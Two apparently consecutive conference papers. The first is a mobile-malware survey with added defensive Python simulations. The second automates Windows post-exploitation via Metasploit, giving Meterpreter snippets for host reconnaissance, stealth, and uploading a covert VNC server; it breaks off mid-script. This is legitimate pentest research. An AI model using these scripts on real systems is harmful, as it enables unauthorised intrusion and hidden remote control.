Abstract. The malware threat for mobile phones is expected to increase with the functionality enhancement of mobile phones. This threat is exacerbated by the surge in the population of smart phones with stable Internet access, which provide attractive targets for malware developers. Prior research on malware protection has focused on avoiding the negative impact of the functionality limitations of mobile phones, so as to keep the performance cost within the limitations of mobile phones. In contrast, this paper investigates the positive impact of these limitations on suppressing the development of mobile malware. We study the state-of-the-art mobile malware, as well as the progress of academic research and industrial effort against mobile malware. Our study shows that the functionality limitations of mobile phones should be considered as advantages, as they have a significant impact on shrinking the living space of mobile malware. From this perspective, we propose and analyze three potential directions for effective malware detection and prevention on mobile phones.
1 Introduction
Malware is one of the most well-known security threats to mobile phones. The concern comes from privacy disclosure, as more and more people carry mobile phones all the time and store more and more sensitive information on them. The malware targeting mobile phones (called mobile malware) has developed slowly in the past five years since the first proof-of-concept mobile malware “Cabir” was proposed in 2004¹. Until now, the total number of mobile malwares is known to be in the hundreds, which is a small number compared to millions of PC malwares². Nonetheless, mobile malware causes serious public concern as the population of mobile phones is much larger than the population of PCs. According to Gartner, worldwide mobile phone sales totaled 269.1 million units in the first quarter of 2009³, while worldwide PC shipments only reached 292 million units in the whole year of 2008⁴. A large scale outbreak of mobile malware could be more serious than the outbreaks of PC malware that we have seen in the past decades. The recent rapid functionality enhancement of mobile phones, driven by the population surge of smart phone platforms, is expected to increase the security threat from mobile malware. The enhanced functionalities such as faster Internet access and standardized programming APIs provide an ideal breeding ground for malware development.

Prior research [1,2,3,4] on malware protection has focused on avoiding the negative impact of the functionality limitations of mobile phones. The major efforts are to keep the performance cost within the limitations of mobile phones. Although the energy-efficiency criterion and other capability restrictions limit the effectiveness of complex malware protection solutions, they also limit the power of mobile malware. The positive impact of these functionality limitations could be one of the major reasons explaining the slow development of mobile malware in the past five years. To understand the impact of the functionality limitations of mobile phones, this paper studies the state-of-the-art mobile malware, and the progress of academic research and industrial effort against mobile malware. Our study shows that the functionality limitations of mobile phones have a significant impact on suppressing the development of mobile malware. From this perspective, we propose and analyze three potential directions for effective malware detection and prevention on mobile phones.

¹ Viruslist, http://www.viruslist.com/en/analysis?pubid=200119916
² Symantec, http://www.symantec.com/business/theme.jsp?themeid=threatreport
³ Gartner, http://www.gartner.com/it/page.jsp?id=985912
⁴ Gartner, http://www.gartner.com/it/page.jsp?id=1040020

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 242–249, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 State-of-the-Art Mobile Malware and Countermeasures

2.1 State and Trends on Mobile Malware
Due to the lack of a sufficient number of wild malware samples, we investigate the state of mobile malware based on the vulnerability records in the Common Vulnerabilities and Exposures (CVE) database⁵. Figure 1(a) shows the distribution of software vulnerabilities on mobile systems in the CVE database retrieved on July 25, 2009. It can be observed that the number of vulnerability records increases dramatically after the rise of the smart phone platform. In particular, iPhone contributes half of the vulnerability records in its first two-and-a-half years. From the distribution of attack types shown in Figure 1(b), until 2007, Denial of Service is still the dominant attack type that can be exploited from the known vulnerabilities (50.0%). This explains why most mobile malware in the past was only able to affect the availability of a mobile phone, for example through application crashes and device resets. Only a few mobile malware samples targeting specific mobile phones were able to launch advanced attacks such as distributed denial of service against some specific phone numbers (Redbrowser Trojan, 2006) [5]. Unfortunately, the functionality limitations for mobile malware are significantly relaxed after the release of smart phone platforms. This trend brings more serious vulnerabilities that allow mobile malware to execute arbitrary code. The percentage of such vulnerability records rose from 7.7% to 22.0% in the past three years. Moreover, the availability of standardized programming APIs on smart phone platforms and faster Internet access via 3G and WiFi make malware development and propagation easier.

Nowadays, a significant barrier for the known mobile malwares is still that user interaction must be involved for those malwares whose purpose is not merely to crash the device. None of today's mobile malwares are able to install secretly without the user accepting the standard security warnings [6]. Social engineering techniques, such as pretending to be a theme, a system patch, or a game installation, are widely used to tempt users to run malwares on mobile phones. So the interest of mobile malware is largely dependent on the market share of mobile phones. The latest cell-phone malware report from F-Secure [6] indicates that, until 2007, 364 out of 373 malwares were designed for the most popular mobile OS, Symbian (47.1% market share in Q4 2008⁶), which however has only six vulnerability records in the CVE database until 2009. The most popular infection mechanism is still user download (373 cases). The rapid market growth of iPhone will make it the next attractive target for malware development.

⁵ CVE database, http://cve.mitre.org

[Fig. 1 (bar charts, records per year 2002–2009). (a) Mobile systems: iPhone (73, 51.8%), Windows Mobile (16, 11.3%), Palm (15, 10.6%), Other Mobile Systems (15, 10.6%), Android (8, 5.7%), BlackBerry (6, 4.3%), Symbian (6, 4.3%), J2ME (2, 1.4%). (b) Attack types: Denial of Service (43, 30.5%), Other attacks (39, 27.7%), Execute arbitrary code (31, 22.0%), Cross-site scripting (21, 14.9%), Spoof URL bar (7, 5.0%).]

Fig. 1. Distribution of software vulnerabilities on (a) mobile systems and (b) attack types in the Common Vulnerabilities and Exposures database. Each bar describes the number of vulnerability records for each mobile system or attack type in each year. The numbers after the legend text are the sum and percentage of the record number from 2002 to 2009. Note: The attack types are classified based on the description of vulnerability records. If the description of a vulnerability record contains both “execute arbitrary code” and “denial of service”, it will be classified into “execute arbitrary code”.

2.2 Academic Research against Mobile Malware
The academic research on mobile malware detection began later, as mobile malware developed slowly in the past few years. Fewer than ten samples of wild mobile malware, including Cabir, Mabir, Commwarrior, and Lasco, are available to academic researchers. Most researchers designed their own artificial malware to evaluate their protection solutions [1,7]. Existing research on mobile malware detection focuses on tailoring traditional signature-based detection techniques to the resource-constrained computation environment on mobile phones. Bose et al. introduced a signature scheme that characterizes high-level program behaviors to reduce the cost of real-time monitoring and signature comparison [1]. Cheng et al. [2] bypassed the resource limitations by presenting a firewall solution between the cellular network and the Internet to filter suspicious data streams. Besides traditional signature-based malware detection, recent research has also started new attempts to prevent the threat of mobile malware. Zhang et al. [3] and Muthukumaran et al. [4] investigated integrity-measurement-based malware prevention that enforces lightweight mandatory access control to prevent malicious program behaviors. The major challenge of this approach is to automatically define sound rules without involving considerable human labor. Kim et al. [7] and Liu et al. [8] examined power anomaly monitoring, which detects mobile malware by observing the extra power consumption caused by malicious behaviors. The major obstacle for this technique is the difficulty in accurately quantifying and modeling power consumption for multitask mobile platforms.

⁶ Smartphone Market Share, http://en.wikipedia.org/wiki/Smartphone

2.3 Industrial Effort against Mobile Malware
The industrial effort against mobile malware mainly comes from anti-virus vendors and mobile OS providers. Most anti-virus vendors offer mobile versions of their anti-virus software. We examined the latest specifications of mobile anti-virus software from ESET, F-Secure, Kaspersky, McAfee, Norton, and Trend Micro. The core technique used in these solutions is still traditional signature-based detection that monitors execution traces and file accesses. For these products, the major challenges, besides the constrained resources of mobile phones, also come from social engineering, which may tempt users to skip the warning provided by the anti-virus software. Once malware is launched, the anti-virus software could be neutralized due to weak runtime privilege control on mobile systems. The efforts from mobile OS providers mainly focus on enhancing the privilege control of the mobile OS. The privileges on the latest Symbian OS are defined as capabilities of a program⁷. To access a certain capability, a program must be signed by a certificate that is authorized with the corresponding privilege. These capabilities allow the Symbian OS to control access by applications to the functionalities provided by the platform APIs. Mobile malware is not able to gain a high privilege as long as the high-privilege certificate is not disclosed to malware developers. Some Linux-based smart phone platforms such as MontaVista also provide similar privilege control mechanisms by incorporating a miniaturized version of SELinux⁸.

⁷ Symbian Signed, http://www.symbiansigned.com
⁸ MontaVista, http://www.mvista.com
3 Potential Directions for Effective Malware Detection and Prevention on Mobile Phones

3.1 Monitoring Power Consumption
Battery power consumption is one of the major limitations of mobile phones that limit the complexity of anti-malware solutions. It also poses a challenge for mobile malware, as all critical behaviors for malware propagation, such as accessing WiFi or Bluetooth, consume significant battery power [7]. Any malicious behavior caused by mobile malware also involves extra power consumption. Mobile malware cannot hide these malicious behaviors if the power consumption of normal behaviors can be accurately quantified. As one of the most coarse-grained features that characterize program behaviors, the cost of real-time power consumption monitoring is negligible [7,8]. These factors make power consumption monitoring a potential direction for effective malware detection. Figure 2 illustrates an example of mobile malware detection by monitoring power consumption. Preliminary work has been done in this direction. The first known research in this direction was done by Jacoby and Davis [9]. They proposed a malware detection technique based on the assumption that greedy malwares keep repeating power-consuming behaviors such as scanning adjacent Bluetooth devices. These repeating behaviors result in certain dominant frequencies in the frequency-domain data transformed from the collected time-domain data of power consumption. The malwares are identified from these dominant frequencies. Recent work by Kim et al. [7] proposed another detection technique by comparing the compressed sequences of the power consumption values in each time interval. Liu et al. [8] defined a user-centric power model to estimate the power consumption based on the number or the duration of user actions, such as the duration of calls and the number of SMS messages. Their work uses machine learning techniques to generate rules for malware detection. These works have shown that power anomaly is an effective indicator for suspicious activities on mobile phones.
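As an added example (not code from the paper or from the works it cites), a toy version of the dominant-frequency idea attributed to Jacoby and Davis above: the sampling rate, the idle baseline and the periodic radio burst are constructed assumptions, and the DFT is written out directly so the block runs without extra libraries.

```python
"""Added example, not from the paper: detect a periodic power-hungry
activity (the 'greedy malware' pattern of Section 3.1) as a dominant
frequency in the spectrum of a power trace.

Assumptions (mine): 8 power readings per second, an idle draw of about
50 mW with Gaussian jitter, and a 120 mW burst lasting 0.5 s whenever the
simulated radio scan fires.  No real handset measurements are used.
"""
import math
import random

SAMPLE_RATE_HZ = 8.0      # assumed readings per second
WINDOW = 256              # samples per analysis window (32 s)


def constructed_trace(scan_period_s=None, seed=1):
    """Constructed power trace (mW).  With scan_period_s set, a burst is
    added every scan_period_s seconds, mimicking repeated radio scans."""
    rng = random.Random(seed)
    trace = []
    for i in range(WINDOW):
        t = i / SAMPLE_RATE_HZ
        mw = 50.0 + rng.gauss(0.0, 2.0)              # idle draw plus noise
        if scan_period_s and (t % scan_period_s) < 0.5:
            mw += 120.0                               # 0.5 s radio burst
        trace.append(mw)
    return trace


def power_spectrum(samples):
    """Magnitude spectrum of the mean-removed trace, bins 0 .. N/2-1,
    computed with a direct O(N^2) DFT (fine for a 256-sample window)."""
    n = len(samples)
    mean = sum(samples) / n
    x = [s - mean for s in samples]
    spectrum = []
    for k in range(n // 2):
        re = sum(x[t] * math.cos(2 * math.pi * k * t / n) for t in range(n))
        im = -sum(x[t] * math.sin(2 * math.pi * k * t / n) for t in range(n))
        spectrum.append(math.hypot(re, im))
    return spectrum


def dominant_frequency(samples, ratio_threshold=6.0):
    """Return (freq_hz, peak_ratio, anomalous).

    The strongest non-DC bin is compared with the median of all other bins;
    white-noise-like idle power has no bin standing out, whereas a repeated
    burst puts most of its energy into one bin and its harmonics."""
    spec = power_spectrum(samples)
    bins = spec[1:]                       # drop DC (trace is mean-removed)
    k = max(range(len(bins)), key=bins.__getitem__)
    others = sorted(b for i, b in enumerate(bins) if i != k)
    median = others[len(others) // 2]
    ratio = bins[k] / median if median > 0 else float("inf")
    freq = (k + 1) * SAMPLE_RATE_HZ / len(samples)
    return freq, ratio, ratio >= ratio_threshold
```

A burst every 4 s shows up as a peak at 0.25 Hz with a ratio far above the threshold, while the idle trace stays below it; the same split between "power anomaly detected" and "which activity caused it" is the open problem the section goes on to describe.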
Identifying the causes of these activities is still a challenge for power-based malware detection, as the power consumption of normal behavior is yet to be accurately quantified. Another challenge is that existing mobile phones are not able to provide sufficient precision for power consumption measurement without involving extra measuring devices like an oscilloscope.

[Fig. 2 (plot): power consumption over time, with one interval marked as a power anomaly event caused by certain malware activities.]

Fig. 2. Example of mobile malware detection by monitoring power consumption. The activities of mobile malware are detected based on power anomaly events.

3.2 Increasing Platform Diversity
Platform diversity, which mainly manifests as a lack of standardized programming APIs, was one of the major obstacles for deploying applications on different mobile phone models. It also limits the scope of victim mobile phones for a given mobile malware. It is very difficult, if not impossible, for a mobile malware to use a limited-size payload to infect a large number of mobile phones with completely different programming APIs. This platform diversity is decreasing with the population of smart phones, as device manufacturers prefer to deploy only a few smart phone platforms for all their mobile phones to increase usability and extensibility. The key idea to increase the platform diversity of smart phone platforms is to use a dual mode design for application execution and development. The diverse programming APIs that are specific to each individual mobile phone are used for application execution to prevent the intrusion of mobile malware. The standard programming APIs are used for application development. During installation, a user switches the mobile phone into a bridge phase that maps the standard programming APIs to the diverse programming APIs. Without the confirmation of users, a mobile malware is not able to learn the mapping for the diverse programming APIs that are currently used in the mobile phone. Figure 3 demonstrates an example of the dual mode design.

[Fig. 3 (diagram): Mode A for application development exposes API x at address Ax, API y at address Ay, ...; Mode B for application execution exposes API x at address Bx, API y at address By, ..., with Ax != Bx, Ay != By, ...; the application reaches Mode B only through a one-way random mapping.]

Fig. 3. Example of dual mode design. The intrusion of mobile malware is prevented by self diversity after randomizing the programming APIs.

The major challenge for this approach is to secure the mapping information for legitimate applications and the bridge phase that maps the standard programming APIs to the diverse programming APIs. The established mapping should be updated periodically, for example during each mobile phone startup, to mitigate the threat that mobile malware learns the correct mapping incidentally.

3.3 Enforcing Hardware Sandbox
[Fig. 4 (diagram): the telephony application signals 1. “I am active.” to the hardware sandbox, which sends 2. “Disable yourselves!” to the hardware modules required for Internet access.]

Fig. 4. Example of hardware sandbox application. Real time wiretapping via Internet is prevented as all hardware modules required for Internet access are disabled during a phone call.

Hardware capability limitation, subject to manufacturing cost, was another major limitation that makes it difficult to extend the applications of mobile phones beyond telephony. It also suppresses the damage that can be caused by mobile malware. For example, the weak connectivity of traditional mobile phones meant that the best propagation methods for mobile malware were via Bluetooth and MMS. Although the Internet is more attractive, as it is necessary for mobile malware to propagate globally, stable Internet access with sufficient bandwidth was not available. This is one of the major reasons that no large-scale outbreak has been observed until now. But these hardware capability limitations are being eliminated. More new hardware features such as WiFi and GPS have been integrated into the latest mobile phones. The key idea to mitigate the threat from hardware capability enhancement is to enforce a hardware sandbox that controls access to the hardware. This hardware access control should be enforced by a hardware sandbox rather than a software sandbox like Symbian Signed, because the prevailing social engineering attacks may tempt users to bypass the protection of a software sandbox. This is driven by the fact that the majority of interesting applications on mobile phones are provided by third party software developers who usually do not provide certificates to prove their legitimacy. A hardware sandbox is able to provide baseline protection even when the whole software system has been compromised by mobile malware, which a software sandbox cannot provide. The basic principle in designing a hardware sandbox is to disable the dangerous hardware components when sensitive applications such as telephony are running. Figure 4 illustrates an example of using a hardware sandbox to prevent real time wiretapping via the Internet. The major challenge for a hardware sandbox is to define flexible rules that guarantee the baseline protection while imposing minimal influence on the normal usage of mobile phones. Disabling hardware components is not necessary if fine-grained access controls are available from the hardware sandbox.
Certain physical buttons on mobile phones can be used to switch among the protection levels to increase the usability of hardware sandbox. The remaining challenges are to provide an effective implementation and to securely store and update access control rules. These two challenges may be solved by incorporating a trusted platform module for mobile devices. However, such a hardware product is still not available until now [3].
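The rule-driven behaviour described in this section (sensitive application active, dangerous modules disabled, protection level chosen by a physical button), as an added example in Python that is not the paper's design: the module names, the rule table and the three protection levels are my assumptions, and the event log is constructed.

```python
"""Added example, not from the paper: a small model of the hardware sandbox
rules of Section 3.3.  In a real device these decisions would be taken by
hardware below the OS so that they hold even when the software stack is
compromised; here the same logic is simulated in Python.

Assumed module names, rule table and protection levels (mine, not the
paper's).  Level 0 = off, 1 = baseline, 2 = strict.
"""

NETWORK_MODULES = {"wifi", "3g_data", "bluetooth"}   # paths to the Internet
LOCATION_MODULES = {"gps"}

# While a sensitive application is active, which modules are disabled
# at each protection level.  Figure 4's case is the "telephony" row.
RULES = {
    "telephony": {1: NETWORK_MODULES, 2: NETWORK_MODULES | LOCATION_MODULES},
    "camera":    {1: set(),           2: NETWORK_MODULES},
}


class HardwareSandbox:
    def __init__(self, level=1):
        self.level = level        # changed only by a physical button
        self.active = set()       # sensitive applications currently running

    def set_level(self, level):
        """Physical-button switch between protection levels."""
        if level not in (0, 1, 2):
            raise ValueError("unknown protection level")
        self.level = level

    def app_started(self, app):   # the "I am active." signal of Figure 4
        self.active.add(app)

    def app_stopped(self, app):
        self.active.discard(app)

    def disabled_modules(self):
        """Union of the modules every active sensitive app disables now."""
        if self.level == 0:
            return set()
        disabled = set()
        for app in self.active:
            disabled |= RULES.get(app, {}).get(self.level, set())
        return disabled

    def request(self, module):
        """Gate a hardware access.  The decision deliberately ignores any
        software privilege of the caller: the baseline must hold even if
        the requesting code is malware running with full OS privileges."""
        return module not in self.disabled_modules()


def replay(events, level=1):
    """Replay a constructed event log and return the access decisions.
    Events are ("start", app), ("stop", app) or ("access", module)."""
    sandbox = HardwareSandbox(level)
    decisions = []
    for kind, name in events:
        if kind == "start":
            sandbox.app_started(name)
        elif kind == "stop":
            sandbox.app_stopped(name)
        elif kind == "access":
            decisions.append((name, sandbox.request(name)))
        else:
            raise ValueError("unknown event " + kind)
    return decisions


# Constructed log: a WiFi access before, during and after a phone call.
CALL_EVENTS = [
    ("access", "wifi"),
    ("start", "telephony"),
    ("access", "wifi"),
    ("access", "gps"),
    ("stop", "telephony"),
    ("access", "wifi"),
]
```

At the baseline level the WiFi access during the call is the only one refused; the strict level also refuses GPS during the call, and level 0 refuses nothing, which is the usability trade-off the physical button is meant to expose.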
4 Conclusion
In this paper, we investigated the impact of the functionality limitations of mobile phones on the development of mobile malware. Through a survey of the state-of-the-art mobile malware, as well as the progress of academic research and the industrial effort against mobile malware, our study shows that the functionality limitations of mobile phones have a positive impact on suppressing the development of mobile malware. Based on this analysis, we proposed three potential directions for effective malware detection and prevention on mobile phones after considering these limitations as advantages. The major challenges for these potential directions are identified in this work, and more technical details will be provided in our future work.
References
1. Bose, A., Hu, X., Shin, K.G., Park, T.: Behavioral detection of malware on mobile handsets. In: Proceedings of the 6th International Conference on Mobile Systems, Applications, and Services, pp. 225–238 (2008)
2. Cheng, J., Wong, S.H., Yang, H., Lu, S.: SmartSiren: virus detection and alert for smartphones. In: Proceedings of the 5th International Conference on Mobile Systems, Applications and Services, pp. 258–271 (2007)
3. Zhang, X., Aciicmez, O., Seifert, J.P.: Building efficient integrity measurement and attestation for mobile phone platforms. In: Proceedings of the First International Conference on Security and Privacy in Mobile Information and Communication Systems (2009)
4. Muthukumaran, D., Sawani, A., Schiffman, J., Jung, B.M., Jaeger, T.: Measuring integrity on mobile phone systems. In: Proceedings of the 13th ACM Symposium on Access Control Models and Technologies, pp. 155–164 (2008)
5. Bose, A., Shin, K.G.: On mobile viruses exploiting messaging and Bluetooth services. In: Securecomm and Workshops, pp. 1–10 (2006)
6. Hypponen, M.: State of cell phone malware in 2007. Invited talk at the 16th USENIX Security Symposium, Boston (2007), http://www.usenix.org/events/sec07/tech/
7. Kim, H., Smith, J., Shin, K.G.: Detecting energy-greedy anomalies and mobile malware variants. In: Proceedings of the 6th International Conference on Mobile Systems, Applications, and Services, pp. 239–252 (2008)
8. Liu, L., Yan, G., Zhang, X., Chen, S.: VirusMeter: Preventing your cellphone from spies. In: Proceedings of the 12th International Symposium on Recent Advances in Intrusion Detection (2009)
9. Jacoby, G., Davis, N.: Battery-based intrusion detection. In: Proceedings of the Global Telecommunications Conference (2004)
Automation of Post-exploitation (Focused on MS-Windows Targets)
Mohammad Tabatabai Irani and Edgar R. Weippl
Secure Business Austria, Favoritenstr. 16, A-1040 Vienna, Austria
{mtabatabai,eweippl}@securityresearch.at
http://www.sba-research.org
Abstract. Pentesting is becoming an important activity even for smaller companies. One of the most important economic pressures is the cost of such tests. In order to automate pentests, tools such as Metasploit can be used. Post-exploitation activities can, however, not be automated easily. Our contribution is to extend Meterpreter scripts so that post-exploitation can be scripted. Moreover, using a multi-step approach (pivoting), we can automatically exploit machines that are not directly routable: once the first machine is exploited, the script continues to automatically launch an attack on the next machine, etc.
Keywords: Pentesting, security, exploits.
1 Introduction
On the second Tuesday of each month Microsoft releases its security patches. Attackers are waiting to start reverse engineering these patches to find the original vulnerabilities. If an attacker can find the original vulnerability and write an exploit in the limited time before systems get patched, then she can start a kind of zero-day attack¹. Assuming that the attacker succeeds in writing an exploit in this limited time, she needs to automate the post-exploit activities in order to save time for time-consuming post-exploit activities like password cracking. In some cases an attacker has to perform a blind attack against a large number of targets. In this case the attacker will perform a fully automated exploitation and post-exploitation in order to gather as much data as possible. The purpose of this kind of attack is to take over as many systems as possible. In comparison, the pre-exploit and exploit phases can be automated easily by an attacker because these phases are active on her side. She can control when and how to perform footprinting and scanning for vulnerabilities, and when to start exploiting. After a successful exploitation the attacker probably has a shell on the remote machine, but the attacker is required to perform the desired tasks manually.
¹ This is not exactly a zero-day attack. A zero-day attack means the patch has not been released by the vendor, but in this case the patch is released and the attacker takes advantage of the time gap between the patch release and the update of systems.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 250–257, 2009. © Springer-Verlag Berlin Heidelberg 2009
Windows has some scripting features such as batch files and the Windows Script Host (WSH), which supports both VBScript and JScript. Some built-in tools with automation features, such as WMIC and NETSH, are also available and can help an attacker automate her activities. In all these cases the attacker has to transfer her scripts and tools manually to the target and schedule them for execution. Additionally, this approach is not stealthy because of the limits which usual payloads have.
2 Limits of Usual Payloads
When usual payloads like a remote shell are used, an additional process is generated for each post-exploit task, and this process is visible in the process list of the exploited machine. These processes usually appear in the process list with SYSTEM privilege, which is risky because only certain tasks require SYSTEM privilege, and if, for instance, a process such as cmd.exe is executed in the security context of SYSTEM, every administrator will notice that the machine has been compromised. With rootkits it is possible to hide some of these activities, but transferring and installing a rootkit is not always possible and also has its own limits. If the attacker has a limited payload which can execute only a simple or a specific command, the entire set of post-exploit activities becomes a time-consuming phase. In such a case the attacker has to transfer an advanced remote shell program or some kind of backdoor to the target; otherwise it is not possible to perform most of the post-exploit activities. Moreover, some exploits can only be executed once.
3 Metasploit and Meterpreter
Metasploit [Met] is an open source framework for penetration testers to develop exploits, payloads and tools for penetration testing [MMC+07]. The product has about 270 exploits and 120 payloads covering the initial needs of penetration testers. As the framework is open source, developers are contributing and preparing more and more exploits, payloads and tools based on the framework. The Metasploit framework has different types of interfaces, such as a console and a web interface (as GUI), and a simple command line interface, msfcli. Additionally, it is possible to generate standalone payloads with msfpayload, which is important for targets which are fully patched. One of the unique payloads of Metasploit is Meterpreter. In order to solve all of the mentioned problems regarding usual payloads, the Metasploit developers have prepared an advanced payload which solves all these problems. Meterpreter (an abbreviation of Meta-Interpreter) is the solution to the mentioned problems; it is available in the Metasploit standard package next to all other payloads, and the attacker or penetration tester can use it just like any other payload. Meterpreter is based on a technique called DLL injection [Rem]. By applying this technique the developers of Meterpreter have developed the stealthiest payload, which can remain hidden from antivirus programs and will not be shown in the process list of the exploited machine. Meterpreter has many of the required post-exploit activities as built-in functions, and these built-in functions can fully cover the initial needs of an attacker. The attacker can extend the number of these built-in functions through extensions which can be implemented for special purposes. Additionally, Meterpreter is able to run scripts for automation purposes. As mentioned before, the Meterpreter payload uses remote in-memory DLL injection, and as a result it is not easy for antivirus programs to identify such an attack. In cases where the target machine is not exploitable, the attacker has to use a standalone instance of Meterpreter pretending that it is a useful file. Mark Baggett [Bag08] tested standalone Meterpreter instances against more than 30 antivirus products and, surprisingly, only a few of them classified the standalone instance of Meterpreter as a security risk.
4 Practical Part
One of the most essential tasks in post-exploitation is automating the post-exploit activities as much as possible. Automatic exploitation is possible because it is an attacker-side activity. The attacker can automate all activities, including identifying possible exploits and performing exploits against the targets. However, as post-exploit activities are client-side (victim-side) activities, they have to be automated and scripted on the client side. This limitation is the reason why an attacker is not able to perform the post-exploit activities automatically with usual payloads. By applying Meterpreter it is possible to solve this problem, and by using the Metasploit APIs it is possible to fully script a session including the post-exploit activities. Since post-exploitation is not a static activity, the attacker can implement her own scripts depending on the requirements. In the following subsections some samples are shown in order to illustrate the logic of our scripts.
4.1 Metasploit Programming APIs
At the most basic level there are the REX libraries, where REX stands for Ruby Extension Library. REX contains a series of classes and modules such as a socket subsystem, protocols, logging systems and exploitation classes. It is possible to use REX directly in Ruby scripts; for this purpose the Ruby script should require the rex library. The framework has two main parts: the Framework core and the Framework base. The Framework core is a set of classes which are responsible for dealing with exploit modules, sessions and plugins. It is an interface to modules and plugins. Using the framework is an instance-based approach. This means a developer can create an instance of the framework and then start working with it:
myFramework = Msf::Framework.new
This approach lets the developer have as many instances of the framework concurrently as needed without facing any limitation. In order to use a framework instance in a Ruby script, the Ruby script should require msf/core. The Framework core is extended by the Framework base, which is the other part of the framework. The Framework base is there to simplify working with the Framework core and has additional classes, such as serializing. Another purpose of the Framework base is providing classes for third-party tool development. The Framework base is extended by the Framework UI, which provides different interfaces for Metasploit such as the command line, console, or web interface. The Framework UI classes are used to encapsulate the data for the different interfaces, and they also make it possible for the framework to work and interact with third-party tools.
4.2 Implementing a Standalone Instance
In order to implement some post-exploit scripts, a standalone instance of the framework is used. This standalone instance reads an input file which is the configuration file:
./postExploitScript.rb configFile.ext
postExploitScript.rb is a Ruby script which uses the Metasploit APIs as mentioned before by requiring the rex, msf/base and msf/ui classes. The structure is modular, and the script simply reads the input config file and initializes itself. In the simplest case the script will be used to perform a post-exploit action against a single remote machine. In this case the config file would be something such as:
1: IP address of first machine: x.y.z.y
2: exploit to be used for the remote machine
3: payload to be used for the remote machine
4: degree of stealthiness: 1, 2 or 3
5: type of hash gathering: 1 or 2
A sample config file with pivoting functionality would be something like:
<exploit to be used for the first machine>
<payload to be used for the first machine: windows/meterpreter/bind_tcp>
<degree of stealthiness: 1, 2 or 3>
# the following lines could be repeated for all remote machines i = 1...n
<exploit of remote machine i>
<payload of remote machine i: windows/meterpreter/reverse_tcp>
<degree of stealthiness of machine i>
...
The structure of the standalone script (that is, postExploitScript.rb) is simple and contains the following parts:
– Initializing the script, including initializing the path, requiring the required libraries such as rex, msf/base and msf/ui, and checking the availability of the given config file. Additionally, the public IP address and the listener port, in case a reverse payload is used, are set.
– Reading the config file and checking whether it has a valid format. After that the script initializes related variables such as the arrays of targets, exploits and payloads and the degree of stealthiness. Setting the pivoting flag is performed in this section as well.
– Generating a list of scripts is another part of the standalone script. In this part all available scripts in the related folder (/scripts/meterpreter/) are scanned and saved in an array. The scripts have to follow a valid naming convention: each script name should end with either 1, 2 or 3, which indicates the stealthiness degree of the script. The standalone script automatically generates an array for each degree and saves the scripts in it. This approach offers flexibility, and there is no need to change the standalone script if additional scripts are added in the future.
– Executing the first exploit is the next part of the script. If the config file has been configured for pivoting, then each additional machine will be exploited and, in case of a successful exploitation, the PostExploitMe part will be called for each target.
– The PostExploitMe part is the engine of the standalone script for performing post-exploit activities. This part is responsible for performing the post-exploit activities on the exploited machines, considering the predefined degree of stealthiness.
4.3 Implementing Post-exploit Scripts
The standalone script is an instance of the Metasploit framework with the required configuration, including the target address, exploit and payload. The post-exploit part of the standalone script requires scripts for each post-exploit activity. These post-exploit scripts can be executed either directly in a Meterpreter session or called by the post-exploit part of the standalone script. In order to fully automate a post-exploit scenario the scripts are called by the standalone script, but the results are exactly the same as when the scripts are run manually from a Meterpreter session in msfconsole. As mentioned before, there are three degrees of stealthiness which can be defined in the configuration file. As a result, for each post-exploit activity it is possible to implement up to three versions of a script. For instance, system information gathering can be implemented as follows:
1. Using only Metasploit APIs, which return a limited amount of information:
client.sys.config.sysinfo()
2. Using additionally native commands of Windows, which return more information:
client.sys.process.execute('cmd.exe', '/c systeminfo && set && ver && fsutil fsinfo drives && net user && net localgroup', 'Channelized'=>true)
In this case an additional cmd.exe process is created for a short period of time and can return much more detailed information about the exploited machine.
3. Using additional tools. In this case third-party tools or additional tools of Windows such as WMIC could be used:
client.sys.process.execute('cmd.exe', '/c wmic /output:wmic_sysinfo.txt /interactive:off CPU list brief /format:csv', 'Channelized'=>false)
sleep(15)
print_status("BIOS part...")
client.sys.process.execute('cmd.exe', '/c wmic /append:wmic_sysinfo.txt /interactive:off bios list brief /format:csv', 'Channelized'=>false)
sleep(3)
print_status("OS part...")
client.sys.process.execute('cmd.exe', '/c wmic /append:wmic_sysinfo.txt /interactive:off os list brief /format:csv', 'Channelized'=>false)
sleep(3)
print_status("ComputerSystem part...")
client.sys.process.execute('cmd.exe', '/c wmic /append:wmic_sysinfo.txt /interactive:off computersystem list brief /format:csv', 'Channelized'=>false)
sleep(3)
Process Information. Another important example of a post-exploit activity is identifying which processes (and thus which programs and applications) are running. This helps an attacker gain a better understanding of the exploited machine. For instance, if a DNS.exe process is present in the list of processes, the exploited machine is a DNS server. For this purpose there are also three types of scripts implemented:
– Using only Metasploit APIs (process_1.rb):
myArray = client.sys.process.get_processes()
This script returns a list of processes and saves the results in an XML file.
– Using native commands (process_2.rb):
client.sys.process.execute('cmd.exe', '/c net start && sc query && tasklist /v && tasklist && tasklist /m', 'Channelized'=>true)
This item returns a full list of information regarding processes and services.
– Using additional tools (process_3.rb): By using WMIC it is possible to query the most accurate information regarding services and processes:
print_status("wmic_process part...")
client.sys.process.execute('cmd.exe', '/c wmic /output:wmic_service.txt /interactive:off process list brief /format:csv', 'Channelized'=>false)
sleep(15)
print_status("wmic_service part...")
client.sys.process.execute('cmd.exe', '/c wmic /append:wmic_service.txt /interactive:off service list config /format:csv', 'Channelized'=>false)
sleep(3)
It is possible to implement many sorts of these scripts for different purposes based on the Metasploit APIs or Windows internal tools. Additionally, it is possible to use other third-party tools for much more specific post-exploit activities, for instance installing a VNC server or scanning a network from an exploited machine with Nmap or similar tools.
Installing VNC Server. In order to install VNC, a light version of VNC is required. For this purpose the VNC from http://guh.nu/projects/vnc/ could be used, which is a really light version and can be installed in a stealthy mode. The script has to transfer the following essential files to a temporary directory on the target: (1) omnithread_rt.dll, (2) VNCHooks.dll, (3) WinVNC.exe, and (4) vnc.reg. Installation of this version of VNC is simple and could be something like:
#!/usr/bin/ruby
# Installing a VNC server on target
print_status("Installing VNC server")
sysInfos = client.sys.config.sysinfo()
os = sysInfos['OS']
hostname = sysInfos['Computer']
print_status("uploading the required files...")
client.fs.file.upload_file("omnithread_rt.dll", "myUploads/vnc/omnithread_rt.dll")
client.fs.file.upload_file("WinVNC.exe", "myUploads/vnc/WinVNC.exe")
client.fs.file.upload_file("VNCHooks.dll", "myUploads/vnc/VNCHooks.dll")
client.fs.file.upload_file("vnc.reg", "myUploads/vnc/vnc.reg")
print_status("registering the VNC in registry...")
